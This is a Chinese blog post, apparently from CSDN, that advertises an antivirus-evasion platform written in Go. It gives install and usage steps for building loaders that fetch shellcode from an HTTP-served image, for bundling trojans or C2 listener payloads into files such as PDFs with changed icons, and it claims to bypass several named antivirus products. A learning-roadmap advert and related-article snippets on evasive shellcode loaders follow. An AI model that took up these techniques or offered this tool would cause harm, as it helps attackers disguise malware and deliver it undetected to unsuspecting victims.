Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式

已于 2024-01-18 19:15:54 修改
阅读量469 收藏
点赞数
文章标签: golang gin 开发语言
于 2023-02-27 23:14:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53058639/article/details/129252281
版权

Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式。

cool

时间线:

  • Golang Gin 框架写的免杀平台- (2021.11.12)

  • Golang Gin 框架写的免杀平台,更新捆绑免杀- (2021.11.20)

  • 增加自定义捆绑,修复一个小bug- (2021.11.22)

  • 上传"compile.exe备份",在\service\executable\下,如果生成免杀是0kb的话就把原来的compile.exe删掉,把"compile.exe备份"改成compile.exe,这样的话混淆效果会变差。。。但是至少能用了-(2021.11.25)

##

安装

  1. 安装Go环境,版本要1.17及以上;

  2. 如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:

  • go env -w GO111MODULE=on

  • go env -w GOPROXY=https://goproxy.io,direct

  1. 完毕后执行 go install mvdan.cc/garble@latest

  2. 下载本项目到D盘根目录,文件夹名字改为cool;

  3. 运行cool.exe;

  4. 访问 http://127.0.0.1:9000

##

使用

为减去浏览器扫描的时间,故生成的文件格式为txt,使用时只需要把后缀修改为前端提示的后缀就可以了。

1. 加密1

  • 直接执行exe。

2. 加密2

  • 直接执行exe。

3. 分离1(houqing)

  • 用python起一个HTTP服务(python -m http.server 8080),

  • 把图片放到起http服务的目录下,

  • 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。

4. 分离2

上线方式1

  • 用python起一个HTTP服务(python -m http.server 8080),

  • 把图片放到起http服务的目录下,

  • 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。

上线方式2

  • 执行xxx.exe 参数为shellcode.txt里的内容 。

###

5. 捆绑上线

捆绑内置免杀马

  • 填写信息(免杀方式、listeners或者shellcode等),

  • 上传需要和木马捆绑的文件,

  • 下载完毕后将后缀改为exe,

  • 图标自行修改。

捆绑自定义木马

  • 第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)

  • 点击生成

目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。

##

声明:仅用于技术交流,请勿用于非法用途。

项目地址:GitHub - Ed1s0nZ/cool: Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式。

 网络安全入门学习路线

其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。

1.网络安全法和了解电脑基础

其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...

别被这些看上去很多的东西给吓到了,其实都是很简单的基础知识,同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过,这部分可以直接略过。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。 当然你也可以看下面这个视频教程仅展示部分截图: 学到http和https抓包后能读懂它在说什么就行。

2.网络基础和编程语言

3.入手Web安全

web是对外开放的,自然成了的重点关照对象,有事没事就来入侵一波,你说不管能行吗! 想学好Web安全,咱首先得先弄清web是怎么搭建的,知道它的构造才能精准打击。所以web前端和web后端的知识多少要了解点,然后再学点python,起码得看懂部分代码吧。

最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。

等你用几周的时间学完这些,基本上算是具备了入门合格渗透工程师的资格,记得上述的重点要重点关注哦! 再就是,要正式进入web安全领域,得学会web渗透,OWASP TOP 10等常见Web漏洞原理与利用方式需要掌握,像SQL注入/XSS跨站脚本攻击/Webshell木马编写/命令执行等。

这个过程并不枯燥,一边打怪刷级一边成长岂不美哉,每个攻击手段都能让你玩得不亦乐乎,而且总有更猥琐的方法等着你去实践。

学完web渗透还不算完,还得掌握相关系统层面漏洞,像ms17-010永恒之蓝等各种微软ms漏洞,所以要学习后渗透。可能到这里大家已经不知所云了,不过不要紧,等你学会了web渗透再来看会发现很简单。

其实学会了这几步,你就正式从新手小白晋升为入门学员了,真的不算难,你上你也行。

4.安全体系

不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。

所以想要成为一名合格的网络工程师,想要拿到安全公司的offer,还得再掌握更多的网络安全知识,能力再更上一层楼才行。即便以后进入企业,也需要学习很多新知识,不充实自己的技能就会被淘汰。

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

尾言

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,最后联合CSDN整理了一套【282G】网络安全从入门到精通资料包,需要的小伙伴可以点击链接领取哦! 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

程序员小肖
关注
golang任意代码免杀绕过火绒+电脑管家
2301_79571829的博客
09-01 1212
火绒和电脑管家主要以静态规则为主,但是有时候静态杀起来也挺让人奔溃的,这边分享一下如何拿捏火绒和电脑管家本文主要介绍如何通过garble进行混淆编译来绕过火绒,garble也可以绕过其他杀软,但是对火绒和电脑管家特别有效果,以火绒为例 下面来对比一下golang原生和garble混淆编译后得差距来一个很原始的的shellcode loader代码,将原始shellcode base64后就进行加载执行。
go-packer:golang打包二进制进行免杀
04-07
go-packer golang打包二进制进行免杀
免杀对抗—GO&C#&反VT沙盒&资源分离&混淆加密
最新发布
2301_76227305的博客
10-03 1222
今天主要讲了两个语言,Go和C#。免杀思路和之前讲的python和C差不多,主要是多了个反沙盒VT的内容,主要是给它加个壳,但开源的工具难免会被杀的。还有一些工具不支持对某些语言编译成的exe去加壳,这时候就得自己个壳了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
木马免杀实践-golang
网络安全。
08-09 2174
0x01 简介 这里以github上一个golang免杀项目为例,项目地址:https://github.com/yumusb/CS-Loader/tree/master/go%E7%89%88%E6%9C%AC,原项目使用方法如下,根据其要求生成cobaltstrike木马后,上传virustotal,免杀效果已经比较差了,且生成木马大小为5.9M,比较大。 0x02 解读原项目 原项目–python加密部分 此项目加密shellcode采用的方式是base64 -> RC4加密 -> bas
2024年Go最新GoPass系列免杀基础(一)_go语言免杀Golang框架体系架构的知识
2401_84910977的博客
05-11 1338
前提 Shellcode 已测试过单独运行不被拦截,那么现在需要排查的这个加密是不是太过简单,而且这样需要考虑到,大批量用户使用时,很多十六进制都是固定的,那么也会被特征标记,如果全家桶拦了,相信你也可以动手改一改,你可以将 ascii 码加上一个数如 252+200=457,载入时,再减去。而且每个十六进制占一位,并且自己有位置编号,可以将他们提出来总结,并且 ascii 编码(\xfc为252 \xbb为187 \xaa为170),这样我们有 ascii 码,有数量,有位置,就可以还原回去。
Golang-Gin框架示例二十多个源码
04-26
Golang-Gin框架是Go语言中一款非常流行的Web开发框架,以其高效、简洁和易用性受到广大开发者喜爱。Gin框架基于Martini框架设计,使用了 httprouter 库作为路由解析器,提供了高性能的路由处理能力。在这个“Golang-...
golang-gin:使用Gin框架构建Golang应用,并使用Auth0 + JWT进行身份验证
04-29
使用Gin框架构建Golang应用,并使用Auth0 + JWT进行身份验证 此存储库包含 的代码示例 文章进行 。 设置 使用您的Auth0凭据更新main.go文件。 如果没有帐户,则免费一个帐户。 使用您的Auth0凭据更新views/app.jsx...
golang-gin-api:由gin框架制作的api
06-06
Gin框架在Go语言中构建API的深度解析》 Golang作为一门现代、高效且具有静态类型的语言,近年来在Web开发领域受到了广泛的关注。而Gin框架,正是Go语言中用于快速开发API的一个强大工具。本文将深入探讨Gin框架...
html+golang-gin.zip
08-16
在本项目中,我们主要探讨如何使用HTML与GolangGin框架进行交互,特别是通过XMLHttpRequest(XHR)实现异步通信。Gin是一个用Go语言的高性能Web框架,它提供了快速开发Web应用的能力,而HTML是网页设计的基础...
gin + gorm + jwt + casbin组合实现的RBAC权限管理脚手架Golang-gin-web.zip
11-06
在本文中,我们将深入探讨如何使用Gin、Gorm、JWT和Casbin这四个关键组件构建一个基于Golang的RBAC(Role-Based Access Control)权限管理系统。Gin是一个高效的Web框架,Gorm是一个用于Go语言的ORM库,JWT(Json ...
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 1007
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
免杀方法(六)golang加载器
qq_56426046的博客
10-04 548
在当前目录打开cmd,执行编译命令,这里需要提前安装好go环境,不知道的可以看上篇文章。执行命令,go build main.go。爱你所爱,行你所行,听从你心,无问西东。复制payload字符串。生成c#payload。github项目地址。
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 1987
Go语言目前是最火的编程语言之一,使用go语言的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
Go编免杀木马
渗透测试
06-28 1083
启动main.go -》 加载x1.bin -》加载x2.bin。
Golang-gin-web: RBAC权限管理系统脚手架实现
资源摘要信息:"该脚手架基于Golang语言,结合了Gin、GORM、JWT和Casbin等多个流行开源库,旨在构建一个功能完备的基于角色的访问控制(RBAC)权限管理系统。接下来,我将详细介绍各个技术点及其在此脚手架中的作用。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值